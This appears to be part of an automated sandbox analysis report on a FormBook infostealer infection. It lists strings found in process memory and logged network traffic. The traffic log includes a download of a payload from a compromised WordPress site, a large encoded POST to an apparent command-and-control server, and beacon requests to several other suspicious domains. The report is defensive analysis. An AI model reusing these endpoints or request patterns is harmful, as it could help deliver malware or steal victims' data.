      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: explorer.exe, 00000008.00000000.25160673990.0000000010CA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25697043626.0000000010CA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274208499.0000000010CA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24992408912.0000000010CA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWM
      Source: explorer.exe, 00000008.00000000.25243819681.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25086931059.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24932032632.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25640373945.000000000993D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
      Source: explorer.exe, 00000008.00000000.25692494980.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25156958656.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25272325440.0000000010A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngt
      Source: explorer.exe, 00000008.00000000.25225262464.00000000032C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25250623263.000000000A7C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25110185249.000000000BAA0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000008.00000000.25082733398.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25636566882.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25242419595.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24928124758.000000000985B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microfte
      Source: powershell.exe, 00000003.00000002.25049772110.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlt
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: wscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ransbottompottery.com/
      Source: wscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ransbottompottery.com/ins
      Source: wscript.exe, 0000000A.00000002.28753662700.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ransbottompottery.com/oe07/?0HQL9628=pLC/l6NBeGJNgh7czo/rdhzVs0M3WTYTWFz/T
      Source: wscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ransbottompottery.com/oft
      Source: wscript.exe, 0000000A.00000002.28746890867.0000000004DF9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.www55275.com
      Source: wscript.exe, 0000000A.00000002.28746890867.0000000004DF9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.www55275.com/oe07/
      Source: explorer.exe, 00000008.00000000.25646860356.0000000009A93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
      Source: explorer.exe, 00000008.00000000.25243023958.00000000098B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24929778214.00000000098B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25636566882.000000000985B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
      Source: powershell.exe, 00000003.00000002.25049772110.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: explorer.exe, 00000008.00000000.25697043626.0000000010CA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000008.00000000.25697043626.0000000010CA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSa
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/SL
      Source: explorer.exe, 00000008.00000000.24928124758.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24972070320.000000000D935000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000008.00000000.25212115803.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25038476018.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24890121708.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25604829654.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000008.00000000.25662754237.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25256555759.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24955416813.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25119141628.000000000D3C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?-
      Source: explorer.exe, 00000008.00000000.25243819681.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25086931059.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24932032632.000000000993D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25640373945.000000000993D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
      Source: powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: explorer.exe, 00000008.00000000.25274866476.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24988601363.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25156592146.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24994193905.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25162707812.0000000010E9C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
      Source: explorer.exe, 00000008.00000000.24935249770.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25089996662.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25245055879.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25643384889.00000000099F3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com#6o:
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pestert
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
      Source: DB1.11.drString found in binary or memory: https://login.live.com/
      Source: wscript.exe, 0000000A.00000002.28726950680.0000000000561000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25557072847.0000000000561000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.25544879694.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.25548094023.000000000382A000.00000004.00001000.00020000.00000000.sdmp, DB1.11.drString found in binary or memory: https://login.live.com//
      Source: cmd.exe, 0000000B.00000002.25548094023.000000000382A000.00000004.00001000.00020000.00000000.sdmp, DB1.11.drString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: wscript.exe, 0000000A.00000002.28726950680.0000000000561000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25557072847.0000000000561000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.25544879694.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.25548094023.000000000382A000.00000004.00001000.00020000.00000000.sdmp, DB1.11.drString found in binary or memory: https://login.live.com/v104
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
      Source: powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: explorer.exe, 00000008.00000000.24976531952.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25144772721.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25683145292.000000000DA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000008.00000000.25259410299.000000000D565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25670831989.000000000D565000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
      Source: ieinstal.exe, 00000007.00000002.25340415198.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proofreading.uz/
      Source: ieinstal.exe, 00000007.00000003.25330881472.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25338513892.0000000002C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdp
      Source: ieinstal.exe, 00000007.00000003.25330574718.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877619287.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25341805808.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876049552.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpB
      Source: ieinstal.exe, 00000007.00000003.25330574718.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877619287.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25341805808.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876049552.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpG
      Source: explorer.exe, 00000008.00000000.25153634469.0000000010950000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25689617230.0000000010950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
      Source: explorer.exe, 00000008.00000000.25153634469.0000000010950000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25689617230.0000000010950000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 00000008.00000000.25634414794.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/ocalN
      Source: explorer.exe, 00000008.00000000.24976531952.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25144772721.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25683145292.000000000DA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comqu
      Source: explorer.exe, 00000008.00000000.25135194581.000000000D6DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25077570707.000000000975F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274866476.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25676103180.000000000D6DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25240662344.000000000975F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24993212931.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25161566628.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25262909965.000000000D6DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25699698803.0000000010E9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24923751188.000000000975F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24994193905.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274545356.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25162707812.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: wscript.exe, 0000000A.00000002.28750799284.000000000516F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
      Source: unknownHTTP traffic detected: POST /oe07/ HTTP/1.1Host: www.meizhuangs.comConnection: closeContent-Length: 245786Cache-Control: no-cacheOrigin: http://www.meizhuangs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.meizhuangs.com/oe07/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 48 51 4c 39 36 32 38 3d 64 6a 4f 65 59 77 39 7a 37 65 35 4d 62 39 38 74 6f 4d 55 38 31 36 61 45 46 71 58 66 48 7a 4e 71 37 76 39 55 39 38 68 5f 77 5a 61 4b 37 57 75 6d 68 78 4f 66 6d 49 57 52 72 63 36 41 61 45 68 35 69 71 4f 6a 6b 57 6f 57 78 36 6c 2d 6a 5a 61 48 57 35 33 53 30 37 6a 77 7a 37 6e 4b 36 61 4d 39 61 38 54 4c 4b 4a 74 58 55 49 46 4a 6d 55 57 6f 30 36 33 43 66 75 48 77 58 52 5a 35 42 62 37 70 38 45 6b 72 49 67 51 73 32 51 54 31 72 54 4f 45 79 6a 73 35 50 33 6c 69 73 66 75 6d 69 46 78 55 62 58 64 65 42 79 6a 55 6b 64 41 61 34 47 4d 55 66 45 51 59 58 46 52 4c 45 72 43 44 35 2d 4a 36 38 51 71 72 61 75 74 5f 4d 34 31 56 36 54 74 64 35 78 72 69 57 4f 34 53 73 70 74 44 45 52 68 2d 74 42 59 62 6e 4e 6f 54 53 35 33 58 38 67 53 66 71 5a 70 56 67 5f 44 45 61 6e 66 52 46 74 7a 30 57 37 54 59 73 38 4b 6e 6c 79 64 51 39 34 47 71 45 58 7e 53 74 50 62 34 48 71 62 32 78 6d 7a 6a 6a 4d 28 4b 36 30 78 65 7a 30 48 31 52 44 69 74 73 69 5a 39 74 78 37 55 52 5a 75 5f 28 65 38 4d 6c 64 73 46 42 4f 63 4e 52 7a 41 68 4c 5a 73 2d 47 38 6b 53 57 64 57 57 6d 57 46 4b 57 58 32 54 46 2d 35 47 6c 4f 55 33 4f 73 28 38 7a 42 34 4e 48 4a 64 79 77 51 62 38 79 79 6c 5f 73 71 75 41 71 34 53 53 64 56 53 4f 6a 44 4d 46 28 33 4d 42 70 6b 41 71 4e 6d 73 31 75 61 42 67 4a 75 43 6a 56 5f 38 30 5a 47 32 45 46 49 57 63 39 49 69 67 34 51 30 46 6f 51 42 6e 48 52 39 67 38 70 4d 45 57 5a 47 2d 4c 33 48 58 56 65 77 63 5a 4d 54 4c 72 38 7a 54 42 67 4e 36 6f 7a 4d 63 78 66 69 6f 74 58 71 2d 4f 39 28 63 32 63 67 71 56 37 69 5a 63 49 61 45 6f 42 61 59 33 52 69 50 59 67 4d 33 73 6c 36 43 78 6a 73 70 73 34 7a 68 4b 64 75 52 77 56 67 42 32 38 67 57 50 69 75 4e 32 4d 58 4e 75 68 5a 59 6e 47 65 77 5a 58 6f 61 4f 39 50 51 51 71 4e 77 67 6d 6c 76 6c 4c 4f 35 6b 34 44 71 75 79 54 66 6a 77 30 4d 71 6b 49 5f 57 32 4e 78 54 47 59 67 75 73 74 67 52 74 65 61 6d 74 79 4f 33 6f 5a 52 42 45 58 6e 50 34 39 6b 6e 30 6f 62 48 79 58 45 75 56 75 64 52 71 6b 61 6d 5f 58 2d 32 73 57 6d 55 51 50 61 35 44 35 78 74 54 4b 50 69 64 41 33 5a 6a 74 79 79 39 68 68 78 76 6d 41 54 65 52 5f 42 65 78 5a 73 42 46 6f 37 45 4e 73 51 77 37 6d 71 50 67 59 51 34 28 42 41 6c 6f 34 33 77 5a 30 4e 6e 30 74 36 77 43 78 4b 67 35 70 41 77 57 41 73 36 39 45 7e 4d 47 47 77 58 70 47 47 46 6d 4b 78 38 68 5a 4b 51 64 75 64 73 47 4c 35 5f 68 79 79 73 35 41 79 75 77 54 59 63 4a 41 48 6f 41 68 69 35 6c 37 62 6f 55 75 37 33 44 5f 47 55 58 36 4f 48 70 64 63 4e 6a 31 37 39 57 4a 41 38 47 34 51 62 75 72 4c 78 34 68 75 48 68 4e 7a 6e 68 6b 42 63 59 34 4e 43 6a 48 68 74 67 34 42 4f 39 69 63 45 41 52 35 39 68 46 6b 4a 64 41 56 33 53 54 4f 76 5a
      Source: unknownDNS traffic detected: queries for: proofreading.uz
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/seotheme/gFiMGTqLNz187.mdp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: proofreading.uzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=VBCkGWN3mbdKL69djJN2rdDlRq/RNi1Yl7kVrt0lw4m93269gBnUi9nT/9PpDwJIl7i8 HTTP/1.1Host: www.meizhuangs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=ga39a5RGHObbQca0fqBpykiHYobf5FkgSDcrv7y+pUMgVC128FNTcyIMSfssoxfXuBjY&lP=z6AX5nfHP HTTP/1.1Host: www.priorityfirst.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=RmBYcxyFm1VObidM2bAa3CbHkvDDW3a9A6yXLZmuWUWj0+12Mlvgw6TkPXwNhL4XoXbq&lP=z6AX5nfHP HTTP/1.1Host: www.avi3p3g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=5L6t/KzdVSfbxfVudLgq0Mr4GOR7rghYMCaSZQk4P2LnHPgJfow90/TSCrfR2OXpDivu HTTP/1.1Host: www.python3.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=5clOU3CSmsejcHs1r+/ykQ4Hy9FDmDDZKmpGOjyBkKFC3bezX8w0IGluu7zAR9IQ1uAi&lP=z6AX5nfHP HTTP/1.1Host: www.b12-overdose.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=d5su3Z4iOwMZnhaJlYvQjVnFWUJeY1xeLTB2izYPxxrSUwfZ7XCIsMdyeMGBiIZ8vgNU HTTP/1.1Host: www.vivino.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=sLR7Kynk+A1Dhvlq5c1LtQV19otxtN9oy0czYRBh5HIDSu6LN2YXKPz/VtbWvZwWCPAY&lP=z6AX5nfHP HTTP/1.1Host: www.erinandroger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=66zN2ANa36y2SQxhNXKo0SAKr+1fbVR3z5i//1ienxLdBVM2rHrI4b7mKnIyPmnq8yDA HTTP/1.1Host: www.www55275.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 109.94.209.55:443 -> 192.168.11.20:49780 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
